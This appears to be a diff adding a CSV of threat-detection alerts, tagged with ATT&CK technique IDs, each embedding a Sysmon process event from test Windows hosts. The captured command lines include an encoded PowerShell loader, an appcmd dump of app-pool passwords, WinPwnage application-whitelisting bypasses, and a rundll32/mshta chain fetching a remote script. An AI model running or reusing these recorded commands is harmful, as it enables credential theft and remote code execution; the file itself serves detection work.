+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T01:29:18.742817Z"">
+    </TimeCreated>
+    <EventRecordID>5934</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""324"" ThreadID=""2260"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 01:29:18.702</Data>
+    <Data Name=""ProcessGuid"">365ABB72-3D6E-5CEB-0000-0010AFA2FF00</Data>
+    <Data Name=""ProcessId"">3812</Data>
+    <Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
+    <Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Server Command Line Admin Tool</Data>
+    <Data Name=""Product"">Internet Information Services</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list apppool &quot;. )&quot; /text:processmodel.password</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
+    <Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
+    <Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
+    <Data Name=""LogonId"">0x82423</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
+    <Data Name=""ParentProcessId"">2584</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1557667846.556756,2019-05-12T17:30:46.556756+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( &quot;C:\Windows\System32\rundll32.exe&quot; ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T13:30:46.400506Z"">
+    </TimeCreated>
+    <EventRecordID>16388</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2032"" ThreadID=""1996"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 13:30:46.213</Data>
+    <Data Name=""ProcessGuid"">365ABB72-2006-5CD8-0000-0010A2862300</Data>
+    <Data Name=""ProcessId"">2960</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url</Data>
+    <Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
+    <Data Name=""LogonId"">0x13a10</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-1FF8-5CD8-0000-00102A342000</Data>
+    <Data Name=""ParentProcessId"">1332</Data>
+    <Data Name=""ParentImage"">C:\Python27\python.exe</Data>
+    <Data Name=""ParentCommandLine"">python  winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557667846.556756,2019-05-12T17:30:46.556756+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T13:30:46.400506Z"">
+    </TimeCreated>
+    <EventRecordID>16388</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2032"" ThreadID=""1996"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 13:30:46.213</Data>
+    <Data Name=""ProcessGuid"">365ABB72-2006-5CD8-0000-0010A2862300</Data>
+    <Data Name=""ProcessId"">2960</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url</Data>
+    <Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
+    <Data Name=""LogonId"">0x13a10</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-1FF8-5CD8-0000-00102A342000</Data>
+    <Data Name=""ParentProcessId"">1332</Data>
+    <Data Name=""ParentImage"">C:\Python27\python.exe</Data>
+    <Data Name=""ParentCommandLine"">python  winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1557667846.556756,2019-05-12T17:30:46.556756+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T13:30:46.400506Z"">
+    </TimeCreated>
+    <EventRecordID>16388</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2032"" ThreadID=""1996"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 13:30:46.213</Data>
+    <Data Name=""ProcessGuid"">365ABB72-2006-5CD8-0000-0010A2862300</Data>
+    <Data Name=""ProcessId"">2960</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url</Data>
+    <Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
+    <Data Name=""LogonId"">0x13a10</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-1FF8-5CD8-0000-00102A342000</Data>
+    <Data Name=""ParentProcessId"">1332</Data>
+    <Data Name=""ParentImage"">C:\Python27\python.exe</Data>
+    <Data Name=""ParentCommandLine"">python  winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[ T1218.005 ] Mshta found running in the system,1558452779.389278,2019-05-21T19:32:59.389278+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line (&quot;C:\Windows\System32\mshta.exe&quot; https://hotelesms.com/talsk.txt) and Parent Image :C:\Windows\System32\rundll32.exe , Parent CommandLine (rundll32.exe  javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true);) in directory : ( C:\Users\IEUser\Desktop\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-21T15:32:57.867089Z"">
+    </TimeCreated>
+    <EventRecordID>4127</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3416"" ThreadID=""3496"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-21 15:32:57.837</Data>
+    <Data Name=""ProcessGuid"">365ABB72-1A29-5CE4-0000-001079F92101</Data>
+    <Data Name=""ProcessId"">2432</Data>
+    <Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
+    <Data Name=""FileVersion"">11.00.9600.16428 (winblue_gdr.131013-1700)</Data>
+    <Data Name=""Description"">Microsoft (R) HTML Application host</Data>
+    <Data Name=""Product"">Internet Explorer</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\mshta.exe&quot; https://hotelesms.com/talsk.txt</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-39CC-5CE3-0000-002096C70000</Data>
+    <Data Name=""LogonId"">0xc796</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-1A29-5CE4-0000-00107BE42101</Data>
+    <Data Name=""ParentProcessId"">2920</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""ParentCommandLine"">rundll32.exe  javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true);</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[ T0000 ] Suspicious process name detected,1558452779.389278,2019-05-21T19:32:59.389278+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( &quot;C:\Windows\System32\mshta.exe&quot; https://hotelesms.com/talsk.txt ) contain suspicious command ( \mshta.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-21T15:32:57.867089Z"">
+    </TimeCreated>
+    <EventRecordID>4127</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3416"" ThreadID=""3496"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-21 15:32:57.837</Data>
+    <Data Name=""ProcessGuid"">365ABB72-1A29-5CE4-0000-001079F92101</Data>
+    <Data Name=""ProcessId"">2432</Data>
+    <Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
+    <Data Name=""FileVersion"">11.00.9600.16428 (winblue_gdr.131013-1700)</Data>
+    <Data Name=""Description"">Microsoft (R) HTML Application host</Data>
+    <Data Name=""Product"">Internet Explorer</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\mshta.exe&quot; https://hotelesms.com/talsk.txt</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-39CC-5CE3-0000-002096C70000</Data>
+    <Data Name=""LogonId"">0xc796</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-1A29-5CE4-0000-00107BE42101</Data>
+    <Data Name=""ParentProcessId"">2920</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""ParentCommandLine"">rundll32.exe  javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true);</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1170] Detecting  Mshta,1558452779.389278,2019-05-21T19:32:59.389278+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line (&quot;C:\Windows\System32\mshta.exe&quot; https://hotelesms.com/talsk.txt) and Parent Image :C:\Windows\System32\rundll32.exe , Parent CommandLine (rundll32.exe  javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true);) in directory : ( C:\Users\IEUser\Desktop\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-21T15:32:57.867089Z"">
+    </TimeCreated>
+    <EventRecordID>4127</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3416"" ThreadID=""3496"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-21 15:32:57.837</Data>
+    <Data Name=""ProcessGuid"">365ABB72-1A29-5CE4-0000-001079F92101</Data>
+    <Data Name=""ProcessId"">2432</Data>
+    <Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
+    <Data Name=""FileVersion"">11.00.9600.16428 (winblue_gdr.131013-1700)</Data>
+    <Data Name=""Description"">Microsoft (R) HTML Application host</Data>
+    <Data Name=""Product"">Internet Explorer</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\mshta.exe&quot; https://hotelesms.com/talsk.txt</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-39CC-5CE3-0000-002096C70000</Data>
+    <Data Name=""LogonId"">0xc796</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-1A29-5CE4-0000-00107BE42101</Data>
+    <Data Name=""ParentProcessId"">2920</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""ParentCommandLine"">rundll32.exe  javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true);</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1557669406.573766,2019-05-12T17:56:46.573766+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( &quot;C:\Windows\System32\rundll32.exe&quot; shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T13:56:12.652868Z"">
+    </TimeCreated>
+    <EventRecordID>16438</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2036"" ThreadID=""296"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 13:56:12.485</Data>
+    <Data Name=""ProcessGuid"">365ABB72-25FC-5CD8-0000-0010906A1300</Data>
+    <Data Name=""ProcessId"">2168</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-2523-5CD8-0000-00204C360100</Data>
+    <Data Name=""LogonId"">0x1364c</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-25EC-5CD8-0000-0010CB0A1000</Data>
+    <Data Name=""ParentProcessId"">684</Data>
+    <Data Name=""ParentImage"">C:\Python27\python.exe</Data>
+    <Data Name=""ParentCommandLine"">python  winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[ T1059 ] wscript or cscript runing script,1634833622.319552,2021-10-21T20:27:02.319552+04:00,,Threat,High,"Found User (LAPTOP-JU4M3I0E\bouss) Trying to run wscript or cscript with Command Line (cscript.exe  //e:jscript testme.js) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (&quot;C:\Windows\System32\cmd.exe&quot;) in directory : ( C:\Users\bouss\Desktop\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
